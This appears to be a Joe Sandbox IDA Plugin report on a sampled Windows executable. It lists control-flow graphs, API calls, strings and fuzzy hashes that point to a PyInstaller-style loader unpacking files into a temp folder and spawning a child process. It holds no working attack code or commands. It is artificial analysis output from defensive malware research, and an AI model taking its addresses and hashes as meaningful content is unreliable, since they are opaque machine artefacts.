7ff7262b5e7e 518->523 528 7ff7262b5ef6-7ff7262b5f27 call 7ff7262b5728 522->528 529 7ff7262b5ed9-7ff7262b5ee5 call 7ff7262b5bb0 522->529 523->522 525->499 536 7ff7262b5f29-7ff7262b5f2b 528->536 537 7ff7262b5f2d-7ff7262b5f6f 528->537 529->528 535 7ff7262b5ee7 529->535 538 7ff7262b5ee9-7ff7262b5ef1 call 7ff7262a9dd0 535->538 536->538 539 7ff7262b5f91-7ff7262b5f9c 537->539 540 7ff7262b5f71-7ff7262b5f75 537->540 538->514 542 7ff7262b5fa2-7ff7262b5fa6 539->542 543 7ff7262b6040 539->543 540->539 541 7ff7262b5f77-7ff7262b5f8c 540->541 541->539 542->543 545 7ff7262b5fac-7ff7262b5ff1 CloseHandle CreateFileW 542->545 543->514 547 7ff7262b6026-7ff7262b603b 545->547 548 7ff7262b5ff3-7ff7262b6021 GetLastError call 7ff7262a4368 call 7ff7262a7970 545->548 547->543 548->547
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                  • Instruction ID: 844bbac7ab75d2492d9f0b65b688703f1700d7529a157cc66c90983e86961d15
                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                  • Instruction Fuzzy Hash: 6CC1C236B28A4285EB10DF69CC902AE77A5FB49BA8F510236DF2E5B794CF38D451C710

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297A1B
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297A9E
                                                                                                                                  • DeleteFileW.KERNELBASE(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297ABD
                                                                                                                                  • FindNextFileW.KERNELBASE(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297ACB
                                                                                                                                  • FindClose.KERNEL32(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297ADC
                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,00007FF726297EF9,00007FF7262939E6), ref: 00007FF726297AE5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                  • String ID: %s\*
                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                  • Instruction ID: 1b1956245d3416edf85f8a04eb868c9f64eb61a78bfa4c2d86ad5eef3614bb2d
                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                  • Instruction Fuzzy Hash: 1C419121A1D54295EA20AB24EC845BBB3E0FBD8750FE40A33D59D426C4EF3CD74A8F21

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 840 7ff7262b518c-7ff7262b51c1 call 7ff7262b4898 call 7ff7262b48a0 call 7ff7262b4908 847 7ff7262b52ff-7ff7262b536d call 7ff7262a9c10 call 7ff7262b0888 840->847 848 7ff7262b51c7-7ff7262b51d2 call 7ff7262b48a8 840->848 860 7ff7262b536f-7ff7262b5376 847->860 861 7ff7262b537b-7ff7262b537e 847->861 848->847 853 7ff7262b51d8-7ff7262b51e3 call 7ff7262b48d8 848->853 853->847 859 7ff7262b51e9-7ff7262b520c call 7ff7262a9c58 GetTimeZoneInformation 853->859 873 7ff7262b5212-7ff7262b5233 859->873 874 7ff7262b52d4-7ff7262b52fe call 7ff7262b4890 call 7ff7262b4880 call 7ff7262b4888 859->874 865 7ff7262b540b-7ff7262b540e 860->865 862 7ff7262b5380 861->862 863 7ff7262b53b5-7ff7262b53c8 call 7ff7262ac90c 861->863 866 7ff7262b5383 862->866 880 7ff7262b53d3-7ff7262b53ee call 7ff7262b0888 863->880 881 7ff7262b53ca 863->881 865->866 867 7ff7262b5414-7ff7262b541c call 7ff7262b4f10 865->867 871 7ff7262b5388-7ff7262b53b4 call 7ff7262a9c58 call 7ff72629b870 866->871 872 7ff7262b5383 call 7ff7262b518c 866->872 867->871 872->871 878 7ff7262b5235-7ff7262b523b 873->878 879 7ff7262b523e-7ff7262b5245 873->879 878->879 885 7ff7262b5259 879->885 886 7ff7262b5247-7ff7262b524f 879->886 899 7ff7262b53f0-7ff7262b53f3 880->899 900 7ff7262b53f5-7ff7262b5407 call 7ff7262a9c58 880->900 887 7ff7262b53cc-7ff7262b53d1 call 7ff7262a9c58 881->887 890 7ff7262b525b-7ff7262b52cf call 7ff7262b97e0 * 4 call 7ff7262b1e6c call 7ff7262b5424 * 2 885->890 886->885 893 7ff7262b5251-7ff7262b5257 886->893 887->862 890->874 893->890 899->887 900->865
                                                                                                                                  APIs
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51BA
                                                                                                                                    • Part of subcall function 00007FF7262B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262B491C
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51CB
                                                                                                                                    • Part of subcall function 00007FF7262B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262B48BC
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51DC
                                                                                                                                    • Part of subcall function 00007FF7262B48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262B48EC
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C6E
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: GetLastError.KERNEL32(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C78
                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7262B541C), ref: 00007FF7262B5203
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                  • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                  • Instruction ID: 8fe1058f6b5a8e3d7cfb2f1c69d1a536a616284187221a40719b0a1ab710fa2d
                                                                                                                                  • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                  • Instruction Fuzzy Hash: 36515E32A1864286E710FF21EC816AAA7E4FB5C784FC44137EA4D57A96DF7CE4408F60
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                  • Instruction ID: 34412c27ca6c70d7af68673097d360db7a4469c395efaca0c27784d3cd456fc3
                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                  • Instruction Fuzzy Hash: 92F0C822A2964286F7609F60BC88367B3D0FB84768F98073AD96D066D4DF3CD158CE10

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 179 7ff7262918f0-7ff72629192b call 7ff726293f70 182 7ff726291bc1-7ff726291be5 call 7ff72629b870 179->182 183 7ff726291931-7ff726291971 call 7ff7262976a0 179->183 188 7ff726291977-7ff726291987 call 7ff72629f9f4 183->188 189 7ff726291bae-7ff726291bb1 call 7ff72629f36c 183->189 194 7ff7262919a1-7ff7262919bd call 7ff72629f6bc 188->194 195 7ff726291989-7ff72629199c call 7ff726292760 188->195 192 7ff726291bb6-7ff726291bbe 189->192 192->182 200 7ff7262919bf-7ff7262919d2 call 7ff726292760 194->200 201 7ff7262919d7-7ff7262919ec call 7ff7262a4154 194->201 195->189 200->189 206 7ff726291a06-7ff726291a87 call 7ff726291bf0 * 2 call 7ff72629f9f4 201->206 207 7ff7262919ee-7ff726291a01 call 7ff726292760 201->207 215 7ff726291a8c-7ff726291a9f call 7ff7262a4170 206->215 207->189 218 7ff726291aa1-7ff726291ab4 call 7ff726292760 215->218 219 7ff726291ab9-7ff726291ad2 call 7ff72629f6bc 215->219 218->189 224 7ff726291ad4-7ff726291ae7 call 7ff726292760 219->224 225 7ff726291aec-7ff726291b08 call 7ff72629f430 219->225 224->189 230 7ff726291b0a-7ff726291b16 call 7ff7262925f0 225->230 231 7ff726291b1b-7ff726291b29 225->231 230->189 231->189 233 7ff726291b2f-7ff726291b3e 231->233 235 7ff726291b40-7ff726291b46 233->235 236 7ff726291b60-7ff726291b6f 235->236 237 7ff726291b48-7ff726291b55 235->237 236->236 238 7ff726291b71-7ff726291b7a 236->238 237->238 239 7ff726291b8f 238->239 240 7ff726291b7c-7ff726291b7f 238->240 242 7ff726291b91-7ff726291bac 239->242 240->239 241 7ff726291b81-7ff726291b84 240->241 241->239 243 7ff726291b86-7ff726291b89 241->243 242->189 242->235 243->239 244 7ff726291b8b-7ff726291b8d 243->244 244->242
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                  • API String ID: 677216364-3497178890
                                                                                                                                  • Opcode ID: deaae50b7106debf6dd3237eccedc137acb274afc22986999547f6217f1860e2
                                                                                                                                  • Instruction ID: 5cf8b9836d276987a1a60c7bab66004f99c0991779a86e834769222592a6c06c
                                                                                                                                  • Opcode Fuzzy Hash: deaae50b7106debf6dd3237eccedc137acb274afc22986999547f6217f1860e2
                                                                                                                                  • Instruction Fuzzy Hash: 7771BA31A1A68685EB50EB15DC543FBA3E1EB88784FA04037D98D47799FF6CE6448F20

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 245 7ff7262915c0-7ff7262915d1 246 7ff7262915d3-7ff7262915dc call 7ff726291050 245->246 247 7ff7262915f7-7ff726291611 call 7ff726293f70 245->247 254 7ff7262915ee-7ff7262915f6 246->254 255 7ff7262915de-7ff7262915e9 call 7ff7262925f0 246->255 252 7ff726291613-7ff72629163a call 7ff726292760 247->252 253 7ff72629163b-7ff726291655 call 7ff726293f70 247->253 261 7ff726291671-7ff726291688 call 7ff72629f9f4 253->261 262 7ff726291657-7ff72629166c call 7ff7262925f0 253->262 255->254 267 7ff72629168a-7ff7262916a6 call 7ff726292760 261->267 268 7ff7262916ab-7ff7262916af 261->268 269 7ff7262917c5-7ff7262917c8 call 7ff72629f36c 262->269 278 7ff7262917bd-7ff7262917c0 call 7ff72629f36c 267->278 271 7ff7262916b1-7ff7262916bd call 7ff7262911f0 268->271 272 7ff7262916c9-7ff7262916e9 call 7ff7262a4170 268->272 276 7ff7262917cd-7ff7262917df 269->276 279 7ff7262916c2-7ff7262916c4 271->279 282 7ff7262916eb-7ff726291707 call 7ff726292760 272->282 283 7ff72629170c-7ff726291717 272->283 278->269 279->278 292 7ff7262917b3-7ff7262917b8 282->292 285 7ff7262917a6-7ff7262917ae call 7ff7262a415c 283->285 286 7ff72629171d-7ff726291726 283->286 285->292 287 7ff726291730-7ff726291752 call 7ff72629f6bc 286->287 294 7ff726291754-7ff72629176c call 7ff72629fdfc 287->294 295 7ff726291785-7ff72629178c 287->295 292->278 300 7ff726291775-7ff726291783 294->300 301 7ff72629176e-7ff726291771 294->301 297 7ff726291793-7ff72629179c call 7ff726292760 295->297 304 7ff7262917a1 297->304 300->297 301->287 303 7ff726291773 301->303 303->304 304->285
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                  • API String ID: 2030045667-1550345328
                                                                                                                                  • Opcode ID: 8da1356b980ad99f90ff16109f9d3581799c9c6d40cac0b91caa3627f7736f04
                                                                                                                                  • Instruction ID: cda449038049661bc22f45859f58773acf11fc32d7f45ac7f7ab00fe250b281e
                                                                                                                                  • Opcode Fuzzy Hash: 8da1356b980ad99f90ff16109f9d3581799c9c6d40cac0b91caa3627f7736f04
                                                                                                                                  • Instruction Fuzzy Hash: 4B516F61B0A65391EA10BB16DD502B7A3D0FF84794FE44133DD1D0B695EF6CE6548B20

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                  • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                  • API String ID: 2895956056-699529898
                                                                                                                                  • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                  • Instruction ID: 35eb286263bd7db5e40b24c4a8a57569bf2127489efe52d3a4d344413c5309e9
                                                                                                                                  • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                  • Instruction Fuzzy Hash: 8C414D32A1978281DA20AB20EC552ABB2E1FBC8370F940736E6AD477D5DF7CD5448F50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 553 7ff7262911f0-7ff72629124d call 7ff72629b0a0 556 7ff72629124f-7ff726291276 call 7ff7262925f0 553->556 557 7ff726291277-7ff72629128f call 7ff7262a4170 553->557 562 7ff726291291-7ff7262912a8 call 7ff726292760 557->562 563 7ff7262912ad-7ff7262912bd call 7ff7262a4170 557->563 568 7ff726291409-7ff72629141e call 7ff72629ad80 call 7ff7262a415c * 2 562->568 569 7ff7262912bf-7ff7262912d6 call 7ff726292760 563->569 570 7ff7262912db-7ff7262912ed 563->570 584 7ff726291423-7ff72629143d 568->584 569->568 572 7ff7262912f0-7ff726291315 call 7ff72629f6bc 570->572 579 7ff726291401 572->579 580 7ff72629131b-7ff726291325 call 7ff72629f430 572->580 579->568 580->579 586 7ff72629132b-7ff726291337 580->586 587 7ff726291340-7ff726291368 call 7ff7262994e0 586->587 590 7ff7262913e6-7ff7262913fc call 7ff7262925f0 587->590 591 7ff72629136a-7ff72629136d 587->591 590->579 592 7ff72629136f-7ff726291379 591->592 593 7ff7262913e1 591->593 595 7ff7262913a4-7ff7262913a7 592->595 596 7ff72629137b-7ff726291389 call 7ff72629fdfc 592->596 593->590 598 7ff7262913a9-7ff7262913b7 call 7ff7262b9140 595->598 599 7ff7262913ba-7ff7262913bf 595->599 601 7ff72629138e-7ff726291391 596->601 598->599 599->587 600 7ff7262913c5-7ff7262913c8 599->600 604 7ff7262913ca-7ff7262913cd 600->604 605 7ff7262913dc-7ff7262913df 600->605 606 7ff72629139f-7ff7262913a2 601->606 607 7ff726291393-7ff72629139d call 7ff72629f430 601->607 604->590 608 7ff7262913cf-7ff7262913d7 604->608 605->579 606->590 607->599 607->606 608->572
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message
                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                  • API String ID: 2030045667-2813020118
                                                                                                                                  • Opcode ID: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                                                                                                  • Instruction ID: a58010baf1ef9023b827fa279ac0ea1129fd136a8c9cb1e15bd2524c58cb0c90
                                                                                                                                  • Opcode Fuzzy Hash: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                                                                                                  • Instruction Fuzzy Hash: D351C422A0A65285E660BB16AC403BBA2D1FB85794FE44136DD4D47BD5FF3CE641CF20

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF7262AE3BA,?,?,-00000018,00007FF7262AA063,?,?,?,00007FF7262A9F5A,?,?,?,00007FF7262A524E), ref: 00007FF7262AE19C
                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF7262AE3BA,?,?,-00000018,00007FF7262AA063,?,?,?,00007FF7262A9F5A,?,?,?,00007FF7262A524E), ref: 00007FF7262AE1A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                  • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                  • Instruction ID: 6f44634401380ce1959121a8a5a2dbceb3aa6c7496456b6255f0aa44f70b6e3b
                                                                                                                                  • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                  • Instruction Fuzzy Hash: 0B41F571B1961241FA12AB16AC00677A3D1FF44BA0F894136DD9D57784EF7CEC069BA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF726293834), ref: 00007FF726297CE4
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF726293834), ref: 00007FF726297D2C
                                                                                                                                    • Part of subcall function 00007FF726297E10: GetEnvironmentVariableW.KERNEL32(00007FF72629365F), ref: 00007FF726297E47
                                                                                                                                    • Part of subcall function 00007FF726297E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF726297E69
                                                                                                                                    • Part of subcall function 00007FF7262A7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262A7561
                                                                                                                                    • Part of subcall function 00007FF7262926C0: MessageBoxW.USER32 ref: 00007FF726292736
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                  • API String ID: 740614611-1339014028
                                                                                                                                  • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                  • Instruction ID: b62d58c1c4e63c3f8bbb009fc57ef66ef02c6cb728980c12c084d33d57d83f3e
                                                                                                                                  • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                                                                                                  • Instruction Fuzzy Hash: 61418211A1A64380EA24BB219D512FBA2D1EF89790FD40433DE0D577D6FF3CEA018A60

